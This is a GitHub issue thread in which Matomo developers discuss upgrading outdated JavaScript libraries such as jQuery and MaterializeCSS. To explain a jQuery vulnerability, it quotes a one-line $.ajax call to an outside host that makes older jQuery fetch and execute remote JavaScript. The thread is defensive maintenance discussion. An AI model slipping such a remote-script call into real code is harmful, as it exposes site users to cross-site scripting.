@Findus23 opened this Issue on May 23rd 2018 Member

I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in https://github.com/matomo-org/matomo/commit/99793151cd6d4f318b7a011509bd421685f0537a) to fallback to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

@tsteur commented on May 23rd 2018 Member

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23 commented on May 23rd 2018 Member

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
https://github.com/Dogfalo/materialize/issues/3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur commented on May 23rd 2018 Member

@Findus23 that will be in MaterializeCSS 1.0 but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version and only as part of Matomo 4.0 as it may hard for plugins to keep them compatible with 0.X version and 1.X version of MaterializeCSS etc. But maybe it is not really an issue, it is just a matter of testing and see how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@Findus23 commented on October 12th 2018 Member

BTW: MaterializeCSS 1.0 just came out.

@mmakos-profidata commented on September 16th 2019

Is there a chance that this issue will be resolved in the next version (3.12.0)?

@diosmosis commented on September 16th 2019 Member

It's probably not something I will finish for 3.12, but someone else could finish the work I started.

@tsteur commented on September 16th 2019 Member

I'm not sure what exactly we're planning to upgrade? jQuery we likely can't update since Materialize is not compatible, and we very likely don't want to update Materialise to 1.0 as there are a lot of breaking changes AFAIK and plugins become incompatible and we would not be able to have plugins compatible with new and older versions of Matomo and be a lot of work to update them all if /where needed. This would be rather something for Matomo 4.

@Findus23 commented on September 16th 2019 Member

While I’m normally the one to argue for updating everything, I have to agree here. Most libraries are outdated enough that it isn’t just a quick patch update. And updating everything at once with Matomo 4 makes it easier as things only have to be fixed once and allows enough testing to make sure everything works well.

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Lukas

Am 16.09.2019 um 22:39 schrieb Thomas Steur <notifications@github.com>:


I'm not sure what exactly we're planning to upgrade? jQuery we likely can't update since Materialize is not compatible, and we very likely don't want to update Materialise to 1.0 as there are a lot of breaking changes AFAIK and plugins become incompatible and we would not be able to have plugins compatible with new and older versions of Matomo and be a lot of work to update them all if /where needed. This would be rather something for Matomo 4.


You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub, or mute the thread.

@tsteur commented on September 16th 2019 Member

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Totally, only problem is really when they have major updates with breaking changes. In general the goal should be to update minor and patch releases of libs during a release.

Powered by GitHub Issue Mirror